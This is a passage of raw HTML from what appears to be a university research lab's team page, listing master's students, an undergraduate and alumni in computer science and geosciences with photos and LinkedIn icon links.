8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c361-outer\">\n            <div data-colibri-id=\"182-c361\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c361 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c362\" class=\"d-block style-854 style-local-182-c362 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg\" class=\"wp-image-1050 style-854-image style-local-182-c362-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c362-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c363\" class=\"h-global-transition-all h-heading style-850 style-local-182-c363 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c363\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c364\" class=\"h-text h-text-component style-851 style-local-182-c364 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c365\" class=\"h-text h-text-component style-902 style-local-182-c365 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c366\" class=\"style-855 style-local-182-c366 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c367-outer\">\n            <div data-colibri-id=\"182-c367\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c367 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c368\" class=\"d-block style-854 style-local-182-c368 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg\" class=\"wp-image-1094 style-854-image style-local-182-c368-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c368-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c369\" class=\"h-global-transition-all h-heading style-850 style-local-182-c369 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c369\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c370\" class=\"h-text h-text-component style-851 style-local-182-c370 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c371\" class=\"h-text h-text-component style-902 style-local-182-c371 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c373-outer\">\n            <div data-colibri-id=\"182-c373\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c373 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c374\" class=\"d-block style-854 style-local-182-c374 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg\" class=\"wp-image-874 style-854-image style-local-182-c374-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c374-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c375\" class=\"h-global-transition-all h-heading style-850 style-local-182-c375 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c375\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c376\" class=\"h-text h-text-component style-851 style-local-182-c376 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Master\'s student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c377\" class=\"h-text h-text-component style-902 style-local-182-c377 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c378\" class=\"style-855 style-local-182-c378 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c379-outer\">\n            <div data-colibri-id=\"182-c379\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c379 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c380\" class=\"d-block style-854 style-local-182-c380 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/11/bayo-e1695781168350.jpeg\" class=\"wp-image-1369 style-854-image style-local-182-c380-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c380-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c381\" class=\"h-global-transition-all h-heading style-850 style-local-182-c381 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c381\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c382\" class=\"h-text h-text-component style-851 style-local-182-c382 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Master\'s student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c383\" class=\"h-text h-text-component style-902 style-local-182-c383 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c384\" class=\"style-855 style-local-182-c384 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c168\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c168 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c175\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c175 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c176-outer\">\n            <div data-colibri-id=\"182-c176\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c176 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c177\" class=\"h-global-transition-all h-heading style-844 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c177\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c169\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c169 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c170-outer\">\n            <div data-colibri-id=\"182-c170\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c170 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c171\" class=\"d-block style-831 style-local-182-c171 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c171-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c171-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c172\" class=\"h-global-transition-all h-heading style-832 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c172\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c173\" class=\"h-text h-text-component style-833 style-local-182-c173 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c174\" class=\"style-835 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c254\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c254 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c280\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c280 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c281-outer\">\n            <div data-colibri-id=\"182-c281\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c281 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c282\" class=\"h-global-transition-all h-heading style-926 style-local-182-c282 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c282\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c255\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c255 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c256-outer\">\n            <div data-colibri-id=\"182-c256\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c256 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c257\" class=\"d-block style-913 style-local-182-c257 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-2.jpg\" class=\"wp-image-1595 style-913-image style-local-182-c257-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c257-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c258\" class=\"h-global-transition-all h-heading style-914 style-local-182-c258 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c258\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c259\" class=\"h-text h-text-component style-915 style-local-182-c259 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c261\" class=\"style-917 style-local-182-c261 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c262-outer\">\n            <div data-colibri-id=\"182-c262\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c262 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c263\" class=\"d-block style-918 style-local-182-c263 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg\" class=\"wp-image-1597 style-918-image style-local-182-c263-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm 